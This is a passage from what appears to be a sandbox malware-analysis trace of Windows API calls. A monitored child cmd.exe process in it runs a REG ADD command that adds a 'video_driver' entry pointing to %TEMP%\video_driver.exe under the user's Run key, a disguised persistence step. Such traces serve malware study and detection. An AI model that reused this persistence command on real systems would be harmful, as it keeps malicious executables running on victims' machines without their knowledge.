(HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x383f48) returned 0x1a [0039.198] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x383f48 | out: hHeap=0x370000) returned 1 [0039.198] GetProcessHeap () returned 0x370000 [0039.198] GetProcessHeap () returned 0x370000 [0039.198] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385930) returned 1 [0039.198] GetProcessHeap () returned 0x370000 [0039.198] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385930) returned 0x6c [0039.198] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385930 | out: hHeap=0x370000) returned 1 [0039.198] SetLastError (dwErrCode=0x0) [0039.198] GetLastError () returned 0x0 [0039.198] FormatMessageW (in: dwFlags=0x1300, lpSource=0x0, dwMessageId=0x0, dwLanguageId=0x0, lpBuffer=0xcf7b8, nSize=0x0, Arguments=0x0 | out: lpBuffer="夰8\x0cㅶ\x8a\x0c㝓\x8a") returned 0x27 [0039.202] GetLastError () returned 0x0 [0039.202] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0039.202] GetProcessHeap () returned 0x370000 [0039.202] GetProcessHeap () returned 0x370000 [0039.202] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384d90) returned 1 [0039.202] GetProcessHeap () returned 0x370000 [0039.202] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384d90) returned 0x2 [0039.202] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384d90 | out: hHeap=0x370000) returned 1 [0039.202] GetProcessHeap () returned 0x370000 [0039.202] RtlAllocateHeap (HeapHandle=0x370000, Flags=0xc, Size=0x50) returned 0x385ae8 [0039.202] SetLastError (dwErrCode=0x0) [0039.202] LocalFree (hMem=0x385930) returned 0x0 [0039.202] __iob_func () returned 0x77032900 [0039.202] _fileno (_File=0x77032920) returned 1 [0039.202] _errno () returned 0x5f07d8 [0039.202] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.202] _errno () returned 0x5f07d8 [0039.202] GetFileType (hFile=0x7) returned 0x2 [0039.203] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0039.203] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xcf778 | out: lpMode=0xcf778) returned 1 [0039.203] __iob_func () returned 0x77032900 [0039.203] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0039.203] lstrlenW (lpString="The operation completed successfully.\r\n") returned 39 [0039.203] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x385ae8*, nNumberOfCharsToWrite=0x27, lpNumberOfCharsWritten=0xcf7a0, lpReserved=0x0 | out: lpBuffer=0x385ae8*, lpNumberOfCharsWritten=0xcf7a0*=0x27) returned 1 [0039.203] GetProcessHeap () returned 0x370000 [0039.203] GetProcessHeap () returned 0x370000 [0039.204] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x3858a0) returned 1 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x3858a0) returned 0x88 [0039.204] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3858a0 | out: hHeap=0x370000) returned 1 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x37f200) returned 1 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x37f200) returned 0x10 [0039.204] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x37f200 | out: hHeap=0x370000) returned 1 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384ee0) returned 1 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384ee0) returned 0x14 [0039.204] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384ee0 | out: hHeap=0x370000) returned 1 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x383f20) returned 1 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x383f20) returned 0x1e [0039.204] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x383f20 | out: hHeap=0x370000) returned 1 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x37f1e8) returned 1 [0039.204] GetProcessHeap () returned 0x370000 [0039.204] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x37f1e8) returned 0x10 [0039.204] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x37f1e8 | out: hHeap=0x370000) returned 1 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384ec0) returned 1 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384ec0) returned 0x14 [0039.205] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384ec0 | out: hHeap=0x370000) returned 1 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x385ae8) returned 1 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x385ae8) returned 0x50 [0039.205] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x385ae8 | out: hHeap=0x370000) returned 1 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384da0) returned 1 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384da0) returned 0x14 [0039.205] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384da0 | out: hHeap=0x370000) returned 1 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384dc0) returned 1 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384dc0) returned 0x14 [0039.205] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384dc0 | out: hHeap=0x370000) returned 1 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384de0) returned 1 [0039.205] GetProcessHeap () returned 0x370000 [0039.205] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384de0) returned 0x14 [0039.206] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384de0 | out: hHeap=0x370000) returned 1 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384e00) returned 1 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384e00) returned 0x14 [0039.206] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384e00 | out: hHeap=0x370000) returned 1 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x37f1a0) returned 1 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x37f1a0) returned 0x10 [0039.206] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x37f1a0 | out: hHeap=0x370000) returned 1 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384e20) returned 1 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384e20) returned 0x14 [0039.206] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384e20 | out: hHeap=0x370000) returned 1 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384e40) returned 1 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384e40) returned 0x14 [0039.206] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384e40 | out: hHeap=0x370000) returned 1 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] GetProcessHeap () returned 0x370000 [0039.206] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384e60) returned 1 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384e60) returned 0x14 [0039.207] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384e60 | out: hHeap=0x370000) returned 1 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384e80) returned 1 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384e80) returned 0x14 [0039.207] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384e80 | out: hHeap=0x370000) returned 1 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x37f1b8) returned 1 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x37f1b8) returned 0x10 [0039.207] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x37f1b8 | out: hHeap=0x370000) returned 1 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384ea0) returned 1 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384ea0) returned 0x14 [0039.207] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384ea0 | out: hHeap=0x370000) returned 1 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384f00) returned 1 [0039.207] GetProcessHeap () returned 0x370000 [0039.207] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384f00) returned 0x14 [0039.208] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384f00 | out: hHeap=0x370000) returned 1 [0039.208] GetProcessHeap () returned 0x370000 [0039.208] GetProcessHeap () returned 0x370000 [0039.208] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x37f1d0) returned 1 [0039.208] GetProcessHeap () returned 0x370000 [0039.208] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x37f1d0) returned 0x10 [0039.208] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x37f1d0 | out: hHeap=0x370000) returned 1 [0039.208] GetProcessHeap () returned 0x370000 [0039.208] GetProcessHeap () returned 0x370000 [0039.208] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x384f38) returned 1 [0039.208] GetProcessHeap () returned 0x370000 [0039.208] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x384f38) returned 0x14 [0039.208] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x384f38 | out: hHeap=0x370000) returned 1 [0039.208] GetProcessHeap () returned 0x370000 [0039.208] GetProcessHeap () returned 0x370000 [0039.208] HeapValidate (hHeap=0x370000, dwFlags=0x0, lpMem=0x37f188) returned 1 [0039.208] GetProcessHeap () returned 0x370000 [0039.208] RtlSizeHeap (HeapHandle=0x370000, Flags=0x0, MemoryPointer=0x37f188) returned 0x10 [0039.208] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x37f188 | out: hHeap=0x370000) returned 1 [0039.208] exit (_Code=0) Process: id = "5" image_name = "cmd.exe" filename = "c:\\windows\\syswow64\\cmd.exe" page_root = "0x4a297000" os_pid = "0x568" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x314" cmd_line = "C:\\Windows\\system32\\cmd.exe /c REG ADD \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"%TEMP%\\video_driver.exe\" /f" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 5 os_tid = 0x6f4 [0039.342] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24f80c | out: lpSystemTimeAsFileTime=0x24f80c*(dwLowDateTime=0xfe1ca8a0, dwHighDateTime=0x1d623ff)) [0039.342] GetCurrentProcessId () returned 0x568 [0039.342] GetCurrentThreadId () returned 0x6f4 [0039.342] GetTickCount () returned 0x11450cf [0039.343] QueryPerformanceCounter (in: lpPerformanceCount=0x24f804 | out: lpPerformanceCount=0x24f804*=15947600079) returned 1 [0039.344] GetModuleHandleA (lpModuleName=0x0) returned 0x4a890000 [0039.344] __set_app_type (_Type=0x1) [0039.344] __p__fmode () returned 0x770331f4 [0039.344] __p__commode () returned 0x770331fc [0039.345] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8b21a6) returned 0x0 [0039.345] __getmainargs (in: _Argc=0x4a8b4238, _Argv=0x4a8b4240, _Env=0x4a8b423c, _DoWildCard=0, _StartInfo=0x4a8b4140 | out: _Argc=0x4a8b4238, _Argv=0x4a8b4240, _Env=0x4a8b423c) returned 0 [0039.345] GetCurrentThreadId () returned 0x6f4 [0039.345] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x6f4) returned 0x60 [0039.345] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76d30000 [0039.345] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadUILanguage") returned 0x76d5a84f [0039.345] SetThreadUILanguage (LangId=0x0) returned 0x409 [0039.346] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0039.346] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24f79c | out: phkResult=0x24f79c*=0x0) returned 0x2 [0039.346] VirtualQuery (in: lpAddress=0x24f7d3, lpBuffer=0x24f76c, dwLength=0x1c | out: lpBuffer=0x24f76c*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0039.346] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24f76c, dwLength=0x1c | out: lpBuffer=0x24f76c*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0039.346] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24f76c, dwLength=0x1c | out: lpBuffer=0x24f76c*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0039.346] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24f76c, dwLength=0x1c | out: lpBuffer=0x24f76c*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0039.346] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24f76c, dwLength=0x1c | out: lpBuffer=0x24f76c*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x67000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0039.346] GetConsoleOutputCP () returned 0x1b5 [0039.346] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a8b4260 | out: lpCPInfo=0x4a8b4260) returned 1 [0039.346] SetConsoleCtrlHandler (HandlerRoutine=0x4a8ae72a, Add=1) returned 1 [0039.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.347] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0039.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.347] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8b41ac | out: lpMode=0x4a8b41ac) returned 1 [0039.347] _get_osfhandle (_FileHandle=1) returned 0x7 [0039.347] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0039.348] _get_osfhandle (_FileHandle=0) returned 0x3 [0039.348] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8b41b0 | out: lpMode=0x4a8b41b0) returned 1 [0039.348] GetEnvironmentStringsW () returned 0x542190* [0039.348] GetProcessHeap () returned 0x530000 [0039.348] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xaca) returned 0x542c68 [0039.348] FreeEnvironmentStringsW (penv=0x542190) returned 1 [0039.348] GetProcessHeap () returned 0x530000 [0039.348] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4) returned 0x541870 [0039.348] GetEnvironmentStringsW () returned 0x542190* [0039.348] GetProcessHeap () returned 0x530000 [0039.348] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xaca) returned 0x543740 [0039.349] FreeEnvironmentStringsW (penv=0x542190) returned 1 [0039.349] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e70c | out: phkResult=0x24e70c*=0x68) returned 0x0 [0039.349] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x0, lpData=0x24e718*=0x0, lpcbData=0x24e710*=0x1000) returned 0x2 [0039.349] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x4, lpData=0x24e718*=0x1, lpcbData=0x24e710*=0x4) returned 0x0 [0039.349] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x0, lpData=0x24e718*=0x1, lpcbData=0x24e710*=0x1000) returned 0x2 [0039.349] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x4, lpData=0x24e718*=0x0, lpcbData=0x24e710*=0x4) returned 0x0 [0039.349] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x4, lpData=0x24e718*=0x40, lpcbData=0x24e710*=0x4) returned 0x0 [0039.349] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x4, lpData=0x24e718*=0x40, lpcbData=0x24e710*=0x4) returned 0x0 [0039.349] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x0, lpData=0x24e718*=0x40, lpcbData=0x24e710*=0x1000) returned 0x2 [0039.349] RegCloseKey (hKey=0x68) returned 0x0 [0039.349] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24e70c | out: phkResult=0x24e70c*=0x68) returned 0x0 [0039.349] RegQueryValueExW (in: hKey=0x68, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x0, lpData=0x24e718*=0x40, lpcbData=0x24e710*=0x1000) returned 0x2 [0039.350] RegQueryValueExW (in: hKey=0x68, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x4, lpData=0x24e718*=0x1, lpcbData=0x24e710*=0x4) returned 0x0 [0039.350] RegQueryValueExW (in: hKey=0x68, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x0, lpData=0x24e718*=0x1, lpcbData=0x24e710*=0x1000) returned 0x2 [0039.350] RegQueryValueExW (in: hKey=0x68, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x4, lpData=0x24e718*=0x0, lpcbData=0x24e710*=0x4) returned 0x0 [0039.350] RegQueryValueExW (in: hKey=0x68, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x4, lpData=0x24e718*=0x9, lpcbData=0x24e710*=0x4) returned 0x0 [0039.350] RegQueryValueExW (in: hKey=0x68, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x4, lpData=0x24e718*=0x9, lpcbData=0x24e710*=0x4) returned 0x0 [0039.350] RegQueryValueExW (in: hKey=0x68, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24e714, lpData=0x24e718, lpcbData=0x24e710*=0x1000 | out: lpType=0x24e714*=0x0, lpData=0x24e718*=0x9, lpcbData=0x24e710*=0x1000) returned 0x2 [0039.350] RegCloseKey (hKey=0x68) returned 0x0 [0039.350] time (in: timer=0x0 | out: timer=0x0) returned 0x5eb34b60 [0039.350] srand (_Seed=0x5eb34b60) [0039.350] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c REG ADD \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"%TEMP%\\video_driver.exe\" /f" [0039.350] GetCommandLineW () returned="C:\\Windows\\system32\\cmd.exe /c REG ADD \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\" /v \"video_driver\" /t REG_SZ /d \"%TEMP%\\video_driver.exe\" /f" [0039.350] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a8b5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0039.350] GetProcessHeap () returned 0x530000 [0039.350] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x210) returned 0x542190 [0039.351] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x542198, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0039.351] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0039.351] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0039.351] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0039.351] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0039.351] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0039.351] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0039.351] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0039.351] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0039.351] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0039.351] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0039.351] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0039.351] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0039.351] GetProcessHeap () returned 0x530000 [0039.351] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x542c68 | out: hHeap=0x530000) returned 1 [0039.351] GetEnvironmentStringsW () returned 0x5423a8* [0039.351] GetProcessHeap () returned 0x530000 [0039.351] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xae2) returned 0x544d08 [0039.352] FreeEnvironmentStringsW (penv=0x5423a8) returned 1 [0039.352] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0039.352] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a8c0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0039.352] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0039.352] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0039.352] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0039.352] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0039.352] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0039.352] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0039.352] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0039.352] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0039.352] GetProcessHeap () returned 0x530000 [0039.352] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x54) returned 0x5457f8 [0039.352] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24f4d8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0039.352] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", nBufferLength=0x104, lpBuffer=0x24f4d8, lpFilePart=0x24f4d4 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFilePart=0x24f4d4*="Desktop") returned 0x25 [0039.352] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0039.352] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f254 | out: lpFindFileData=0x24f254*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x28c670c0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x28c670c0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x542010 [0039.353] FindClose (in: hFindFile=0x542010 | out: hFindFile=0x542010) returned 1 [0039.353] FindFirstFileW (in: 